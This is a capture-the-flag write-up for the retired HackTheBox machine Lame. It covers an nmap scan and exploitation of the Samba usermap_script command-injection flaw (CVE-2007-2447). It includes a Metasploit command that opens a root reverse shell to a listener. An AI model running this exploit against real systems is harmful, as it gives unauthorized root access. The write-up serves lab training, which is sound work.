⚠️ Lame is a retired HackTheBox machine, so this writeup is safe to publish.

Overview

Lame is one of the oldest and easiest boxes on HackTheBox. Root comes directly from an unauthenticated command-injection vulnerability in Samba (CVE-2007-2447, the usermap_script bug), so there is no separate privilege-escalation step.

Recon

1

nmap -sC -sV -p- -oA nmap/lame 10.10.10.3

Key open ports:

PortService
21vsftpd 2.3.4
22OpenSSH
139Samba 3.0.20
445Samba 3.0.20

Samba 3.0.20 is vulnerable to the username map script command execution flaw.

nmap output

Exploitation

The username field is passed to a shell unsanitised, so we can inject a command by wrapping it in backticks:

1
2

msfconsole -q -x "use exploit/multi/samba/usermap_script; \
  set RHOSTS 10.10.10.3; set LHOST tun0; run"

This drops straight into a root shell — no privesc required.

Flags

FlagValue
userREDACTED
rootREDACTED

Lessons Learned

  • Always version-check network services; ancient Samba/vsftpd builds carry known RCEs.
  • The Samba usermap_script bug is a textbook example of unsanitised input reaching a shell.